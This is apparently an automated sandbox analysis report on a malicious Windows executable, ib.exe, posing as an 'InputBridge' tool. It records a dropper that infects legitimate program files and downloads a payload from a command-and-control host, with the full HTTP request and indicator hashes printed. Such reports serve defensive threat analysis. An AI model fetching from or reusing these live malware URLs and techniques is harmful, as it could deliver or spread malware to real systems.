Windows Analysis Report
ib.exe

ID:	1542812
Product:	CloudBasic
Start time:	13:51:10
Start date:	26.10.2024
Sample:	ib.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1913f1b56f94a777c0130ef6e358586f
SHA1:	b1bc6735532a06744d37245f172408f8c2f062b0
SHA256:	79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows	0BB59688EC3CF103657A0DB5E75075A0	1950DFC6118EEE13977464AA342264B0883DD8E9	4DAB9C9680C0F8F3AD9842314AC752B154DC4D39F25EA4BD428A1C1C9B46E5D6
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	PE32 executable (GUI) Intel 80386, for MS Windows	74C27876C65A47147BA285364470602C	F382E2F940238FA8C42C24AB288B50C317C54B7F	C7EA5132A5F03A488EA78AB139E2033B06343F562E7BF4E11D7CCCD1D225A031
C:\Program Files\7-Zip\Uninstall.exe	PE32 executable (GUI) Intel 80386, for MS Windows	ADE4558B7BB1AB42CCE6F92DF5F0DACC	BDD2C6CA67C7DAC5B5D503AE6BAF4BAE8AB9EC1D	37EFED9E8B690025DE031132CDE63D6EA63C90BDB75AACE86E9738C155F4EC85
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hjErac.exe_b65444b1671fa348e7a4bd9321329eb10a53_61410b6e_7b740b91-304c-499d-98da-40c0ab07024e\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	70D0C689CC98EDE888BC9C50BA62EB03	35F21B354E77962EDE9E2984683C1555EB9FE003	A7FBC4AD9A93B5FF88C771D4B72740E5DD430FF9A14754B74516A5CF23C9C3AA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DD7.tmp.dmp	Mini DuMP crash report, 14 streams, Sat Oct 26 11:52:08 2024, 0x1205a4 type	73E332940C50638847DF70DCBA9FBDB9	E0B3E9C1DF4E758DE7B9ACC0580026CEC653575E	D34829F21B28BE4FBC9A0B4522CA77E28E27CC684E55B317932F52402DE33899
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F01.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	8440FEB51D5DCA44C511169C60D92641	A70BC7E1A982EC182F0BDFC0FC8BC7DF740EDF81	5EA209652F54F9E4FE686EB12C22D5594413B0C8F6EE23AEAF83AB7E35F8BEAA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F21.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F2A76E36838923C94EE6E5D82A88DD6B	0B886FA28B724A0F58A6F1D3A7BDEF7F146A36FA	AC7E74BB442C0BE855DF86638512F09EE5EB4533096CBDFEE2F467144C77C757
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar	ASCII text	D3B07384D113EDEC49EAA6238AD5FF00	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
C:\Users\user\AppData\Local\Temp\1F7369D7.exe	ASCII text	D3B07384D113EDEC49EAA6238AD5FF00	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
C:\Users\user\AppData\Local\Temp\hjErac.exe	PE32 executable (GUI) Intel 80386, for MS Windows	56B2C3810DBA2E939A8BB9FA36D3CF96	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	2D74DA3E8895F55136297001C73F7D38	37327AD8459A6013EF4EA17501410E07F83E6424	9DA04636E9049E84B95853956A4FD24CBF4C0586C77A6651E0C0D8D777A3C7C1

AV Detection

Source: ib.exe

Avira: detected

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

ReversingLabs: Detection: 97%

Source: ib.exe

ReversingLabs: Detection: 94%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Joe Sandbox ML: detected

Source: ib.exe

Joe Sandbox ML: detected

Compliance

Source: ib.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ib.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00CB29E2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00CB2B8C

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\			Jump to behavior

Networking

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:59334 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E2130 Sleep,WSAStartup,WSAGetLastError,socket,WSAGetLastError,htons,inet_addr,setsockopt,sendto,sendto,WSAGetLastError,recvfrom,WSAGetLastError,sendto,WSAGetLastError,exit,

0_2_003E2130

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/cH
Source: hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGsf
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGv
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarg
Source: hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\ib.exe

Windows user hook set: 0 mouse low level NULL

Jump to behavior

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_668a944f-e

System Summary

Source: MyProg.exe.2.dr

Static PE information: section name: Y|uR

Source: hjErac.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\ib.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003ECB71		0_2_003ECB71
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB6D00		2_2_00CB6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\hjErac.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: ib.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hjErac.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: hjErac.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: hjErac.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@6/11@1/2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_00CB119F

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\user\Desktop\ib.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\$InputBridge$
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996

Source: C:\Users\user\Desktop\ib.exe

File created: C:\Users\user\AppData\Local\Temp\hjErac.exe

Jump to behavior

Source: C:\Users\user\Desktop\ib.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ib.exe

ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\ib.exe "C:\Users\user\Desktop\ib.exe"
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe			Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: msvcp140.dll			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: vcruntime140.dll			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ntvdm64.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ib.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: ib.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Unpacked PE file: 2.2.hjErac.exe.cb0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: Hu

Source: ib.exe	Static PE information: section name: Hu
Source: hjErac.exe.0.dr	Static PE information: section name: .aspack
Source: hjErac.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003EBE7B push ebp; ret		0_2_003EBE7E
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003EBE85 push 00000000h; ret		0_2_003EC296
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB1638 push dword ptr [00CB3084h]; ret		2_2_00CB170E
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB600A push ebp; ret		2_2_00CB600D
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB2D9B push ecx; ret		2_2_00CB2DAB
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB6014 push 00CB14E1h; ret		2_2_00CB6425

Source: ib.exe	Static PE information: section name: Hu entropy: 6.93404046385773
Source: hjErac.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934379842605089
Source: MyProg.exe.2.dr	Static PE information: section name: Y|uR entropy: 6.93494119851436
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.933703573716871

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	File created: C:\Users\user\AppData\Local\Temp\hjErac.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
